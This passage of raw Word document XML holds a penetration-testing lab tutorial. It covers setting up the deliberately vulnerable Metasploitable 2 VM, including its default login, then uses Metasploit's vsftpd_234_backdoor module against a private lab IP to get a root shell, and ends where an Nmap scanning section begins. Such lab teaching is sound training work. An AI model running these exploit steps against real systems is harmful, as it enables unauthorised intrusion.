          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Select the RAM you want to provide to the virtual machine. recommended (512Mb). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="00C921FA" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16BD9" w:rsidRDefault="00F16BD9" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="79E27285" wp14:editId="7F50440F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>662940</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>6851650</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3596640" cy="1963999"/>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3-07-10 at 13.13.37.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6640" cy="1963999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F16BD9" w:rsidRDefault="00F16BD9" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16BD9" w:rsidRDefault="00F16BD9" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16BD9" w:rsidRDefault="00F16BD9" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16BD9" w:rsidRDefault="00F16BD9" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F16BD9" w:rsidRDefault="00F16BD9" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="00C921FA" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00716394" w:rsidRDefault="00716394" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00716394" w:rsidRDefault="00716394" w:rsidP="00942D51">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716394">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r w:rsidRPr="00716394">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now choose the option to use an existing virtual hard disk file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003041A2" w:rsidRDefault="00716394" w:rsidP="00716394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00716394">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Now locate the file that we have extracted</w:t>
      </w:r>
      <w:r w:rsidRPr="00716394">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003041A2" w:rsidRDefault="00F16BD9" w:rsidP="003041A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="780"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1893BC13" wp14:editId="76A2D155">
            <wp:extent cx="3612515" cy="203891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2123" cy="2049979"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00725829" w:rsidRPr="003041A2" w:rsidRDefault="00716394" w:rsidP="003041A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003041A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidR="00D37451" w:rsidRPr="003041A2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Now save the file and you will see that the instance is created with the name you have given. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRPr="00C921FA" w:rsidRDefault="00D37451" w:rsidP="00D37451">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C921FA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">We are good to go with the machine just press the start button from the top and wait for it to start and load the instance. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="003041A2" w:rsidP="003041A2">
      <w:r w:rsidRPr="003041A2">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C921FA">
        <w:t>once the instance is loaded you will be asked to provide a login name and password. By default the credentials are :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="00C921FA" w:rsidP="00C921FA"/>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="00C921FA" w:rsidP="00C921FA">
      <w:r>
        <w:t>Default login: msfadmin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37451" w:rsidRDefault="00C921FA" w:rsidP="00C921FA">
      <w:r>
        <w:t xml:space="preserve">Default password: msfadmin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="00C921FA" w:rsidP="00C921FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C921FA" w:rsidRDefault="00C921FA" w:rsidP="00C921FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C921FA">
        <w:t>once you log in with credentials you will be directed to the machine and we are done with the installation</w:t>
      </w:r>
      <w:r w:rsidR="003041A2">
        <w:t xml:space="preserve"> process</w:t>
      </w:r>
      <w:r w:rsidR="003041A2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3589020" cy="21031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3-07-10 at 13.14.34.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9213" cy="2109122"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00C921FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89">
      <w:r>
        <w:t>open your both machines Metasploitable 2 and kali Linux side by side.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89">
      <w:r>
        <w:t xml:space="preserve">First, we need to run both instances at the same time side by side so that we will be able to see the changes clearly. launch Vbox and start both Linux and Metasploitable 2 side by side. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="000F4E89"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>IP addresses of both machines to get an overview of the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>now let’s open the terminal and check for the IP address of Metasploitable 2 on which we are going to perform the attack. use the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>msfadmin@metasploitable:~$ ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t xml:space="preserve">from the above image, we can see that we have an IP address i.e. 192.168.10.5 of the target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="00E27BBC" w:rsidP="000F4E89">
      <w:r w:rsidRPr="00E27BBC">
        <w:t>performing a network scan with the help of the Nmap tool to see what services are running on target and which are way into the target.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="000F4E89"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>in the above command -sV is used for getting the versions of services running on the target machine and -O is used to detect the operating system on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>now we can see that we have so many exploitations ways and vulnerabilities to perform, we will be using the vsftpd_234_backdoor exploit, for exploitation and gaining access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t xml:space="preserve">open Metasploit Framework with the command: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r w:rsidRPr="00E27BBC">
        <w:t>all the info related to the exploit that we need to use i.e. vsftpd_backdoor so now we can use Metasploit to exploit the machine and get access to the command shell. which will eventually give us access to the target machine.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>e Metasploit Framework by the command mentioned below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>root-user-#/ $ msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>after following the commands, we are going to choose the exploit that is vsftpd_backdoor and then set Rhost (targeted IP).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>deploy the exploit into the target machine with the help of msfconsole, to do so we need to follow some basic steps that are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>select the exploit that we are going to use in this case it is vsftpd_backdoor, so we will use the following command :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>msf6~/ use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>after selecting the above exploit let’s set up the target to which we are deploying the exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>msf6~/ (unix/ftp/vsftpd_234_backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>now we can see that we have the option to set RHOST which is the receiver host. so we will set it to the IP address of the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>msf6~/ (unix/ftp/vsftpd_234_backdoor): set RHOST 192.168.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t xml:space="preserve"> final step is to run the exploit </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>msf6~/ (unix/ftp/vsftpd_234_backdoor): exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>after setting RHOST just enter the exploit command and you will see the command shell of the target machine is obtained. Verify by using some command shell commands like print the working directory or ls items in a folder.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pwd, ls -l, ls -a etc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>so we have successfully taken look into how Metasploitable is useful for practicing penetration testing skills.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>we can see that both sides of the files are the same and we have root access to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>Metasploitable 2 is a great machine to practice and learn about penetration testing and hacking, while it comes with so many vulnerabilities and flaws that you can keep on digging and make your pen testing skills better. Currently, another version of Metasploitable is also available you can also go with that the process of configuring and installation is the same as above.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC">
      <w:r>
        <w:t>In the above article, we have learned how to install Metasploitable version 2 successfully and seen a demo of exploitation with the most famous and basic exploit that is vsftpd_</w:t>
      </w:r>
      <w:r w:rsidR="00D50478">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">backdoor, there are many more exploits and techniques to learn and practice. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E27BBC" w:rsidRDefault="00E27BBC" w:rsidP="00E27BBC"/>
    <w:p w:rsidR="000F4E89" w:rsidRDefault="000F4E89" w:rsidP="000F4E89"/>
    <w:p w:rsidR="000F4E89" w:rsidRPr="00E83055" w:rsidRDefault="000F4E89" w:rsidP="00890178">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003041A2" w:rsidRPr="00E83055" w:rsidRDefault="00C134C6" w:rsidP="00890178">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="auto"/>
        </w:rPr>
        <w:t>Network Scanning using Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000F4E89" w:rsidRPr="004B2C8D" w:rsidRDefault="000F4E89" w:rsidP="003041A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="007B3D60" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3688080" cy="3472941"/>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map1-.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm flipV="1">
                      <a:off x="0" y="0"/>
                      <a:ext cx="3702858" cy="3486857"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8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2877185" cy="1287733"/>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map.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2930933" cy="1311789"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Nmap is a powerful network scanning tool that includes a scripting engine to gather additional information about services and potential vulnerabilities. By utilizing Nmap scripts, you can extract more detailed information in a human-readable format. Here's an example of how you can use Nmap scripts to achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 1: Identify open ports and services using basic Nmap scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
